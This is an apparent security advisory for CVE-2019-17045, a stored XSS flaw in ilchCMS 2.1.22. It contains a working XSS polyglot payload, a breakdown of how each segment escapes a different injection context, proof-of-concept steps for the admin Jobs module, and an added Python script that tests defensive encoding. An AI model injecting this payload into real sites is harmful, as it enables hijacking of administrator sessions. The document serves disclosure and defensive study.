
Product Owner: Ilch – Content Management System
CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )
Type: Installable/Customer-Controlled Application
Application Name: ilchCMS – 2.1.22 02/01/22
Application Release Date: 23.05.2019
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: Stored Cross-Site Scripting (XSS polyglot)
Vulnerability Explanation: An XSS polyglot is a single payload that executes unmodified in several injection contexts (HTML text, attribute value, JavaScript string, HTML comment, javascript: URL), so one probe covers contexts that would otherwise each need a tailored vector.
Browsers Verified In:
Firefox 68.0.2 (64-bit)
Anatomy of the polyglot
- jaVasCript:: a label in ECMAScript; a URI scheme otherwise (so the same prefix is inert inside a script block and executable inside an href).
- /*-/*`/*\`/*'/*"/**/: a multi-line comment in ECMAScript; a literal-breaker sequence, since it carries a closing backtick, single quote and double quote for whichever kind of string or quoted attribute the payload landed in.
- (/* */oNcliCk=alert() ): the execution zone, wrapped in invoking parentheses. As JavaScript it calls alert() and assigns the result to a global; once a quote from the previous segment has closed an HTML attribute, oNcliCk=alert() is instead parsed as an event-handler attribute.
- //%0D%0A%0d%0a//: a single-line comment in ECMAScript; a double CRLF if the value is reflected into HTTP response headers.
- </stYle/</titLe/</teXtarEa/</scRipt/--!>: a tag-breaker sequence that closes style, title, textarea and script elements, and an HTML comment via --!>.
- \x3csVg/<sVg/oNloAd=alert()//>\x3e: the element that finally fires. The \x3c and \x3e hex escapes cover JavaScript string contexts, where they decode to < and > before the string reaches the DOM.
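To make the multi-context claim concrete, the following added example (not ilchCMS code, and not part of the original advisory) pushes the exact payload used in this advisory through three constructed rendering contexts that stand in for places a CMS might echo a stored job field: an HTML text node, a double-quoted attribute value and a URL attribute. Python's stdlib HTML tokenizer then reports where an on* handler or a javascript: URL survives, first with the value inserted as-is, then with html.escape applied everywhere, and finally with encoding chosen per context. The templates, the HandlerFinder class and the safe_url / js_string_literal helpers are all assumptions introduced for the demonstration. The JavaScript-string and HTML-comment contexts are deliberately not scanned, because html.parser does not tokenize `</scRipt/` and `--!>` the way browsers do; they are covered by the encoding helper only.

```python
"""Added example (not ilchCMS code): run the advisory's polyglot through three
constructed rendering contexts, unencoded and encoded, and use the stdlib HTML
tokenizer to see where an event handler or javascript: URL survives."""
import html
import json
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The payload from the advisory, byte for byte (raw string: the backslashes
# in /*\` and \x3c are literal characters of the payload, not Python escapes).
POLYGLOT = (
    r"""jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//"""
    r"""</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e"""
)

# Constructed stand-ins for places a CMS might echo a stored job field.
# JS-string and HTML-comment contexts are not scanned: html.parser does not
# tokenize `</scRipt/` and `--!>` the way browsers do.
CONTEXTS = {
    "text node":       '<p class="job-text">{}</p>',
    "attribute value": '<input type="text" name="title" value="{}">',
    "url attribute":   '<a href="{}">apply</a>',
}


class HandlerFinder(HTMLParser):
    """Collects on* attributes and javascript: URLs from every start tag."""
    URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # names are lower-cased, values unescaped
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif (name in self.URL_ATTRS and value
                  and value.strip().lower().startswith("javascript:")):
                self.findings.append(f"{tag}@{name}=javascript:")


def scan(markup):
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def safe_url(value):
    """Scheme allowlist for URL attributes: HTML-escaping cannot neutralise a
    javascript: URL, the scheme itself has to be rejected (hypothetical helper)."""
    scheme = urlsplit(value).scheme  # urlsplit lower-cases the scheme
    return value if scheme in ("http", "https") else "#"


def js_string_literal(value):
    """JSON-encode for a JS string literal, then also escape the characters the
    HTML tokenizer acts on before the JS engine runs (</script>, entities)."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def js_literal_roundtrips(value):
    """The encoded literal must still decode to the original value."""
    return json.loads(js_string_literal(value)) == value


def raw_findings():
    """Payload inserted as-is: every context ends up with a live handler."""
    return {ctx: scan(tpl.format(POLYGLOT)) for ctx, tpl in CONTEXTS.items()}


def html_escaped_findings():
    """html.escape(quote=True) everywhere fixes text and attribute contexts,
    but the URL attribute still carries an executable javascript: scheme."""
    esc = html.escape(POLYGLOT, quote=True)
    return {ctx: scan(tpl.format(esc)) for ctx, tpl in CONTEXTS.items()}


def hardened_findings():
    """Encoding chosen per context: escape for markup, allowlist for URLs."""
    encoders = {
        "text node":       lambda v: html.escape(v, quote=True),
        "attribute value": lambda v: html.escape(v, quote=True),
        "url attribute":   lambda v: html.escape(safe_url(v), quote=True),
    }
    return {ctx: scan(tpl.format(encoders[ctx](POLYGLOT)))
            for ctx, tpl in CONTEXTS.items()}


if __name__ == "__main__":
    for label, result in (("raw", raw_findings()),
                          ("html.escape only", html_escaped_findings()),
                          ("per-context", hardened_findings())):
        print(f"{label:17}", result)
    print("JS literal:", js_string_literal(POLYGLOT))
```

Running the block shows the point of the anatomy list: with the raw value, the text node yields an svg onload, the attribute context yields both an input onclick (the `"` in the literal-breaker closed the value attribute) and the svg onload, and the URL context yields all of that plus a javascript: href. Blanket html.escape clears the first two contexts but leaves the javascript: href intact, which is why URL attributes need a scheme allowlist on top of escaping, and why a value written into a script block needs a JavaScript-string encoder rather than an HTML one.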
Impact:
Stored XSS lets an attacker persist a script in a vulnerable page; it then executes in the browser of every user who views that page, with no further interaction. Unlike reflected XSS, which relies on a victim being socially engineered into opening a crafted link (sent by email, for example), the stored variant needs no link: here, once the payload is saved, any logged-in administrator who opens the stored Jobs entry runs it in the context of the admin panel.
Proof of Concept: Stored Cross-Site Scripting (XSS polyglot)
Affected items: ilchCMS 2.1.22
Step 1: Host the application on a local web server (XAMPP) and install ilchCMS as per the documentation.
Step 2: Log in to the admin panel.
Step 3: Click the Modules tab.
Step 4: Under Modules, click the Jobs tab.
Step 5: Enter the payload in every input field (title, text, email).
Step 6: Click Add. The stored XSS fires in the browser, and because the payload is persisted it fires again on every refresh of the page.
XSS payload used:
HTML comment context (the payload's own --!> closes the comment, so the same string also breaks out when injected between comment markers):
<!--
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e
-->
URL: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat
References:
Website: https://www.ilch.de/
Download Version: https://www.ilch.de/downloads-show-1826.html
Video PoC:
Twitter – https://twitter.com/the_pr0fess0r_

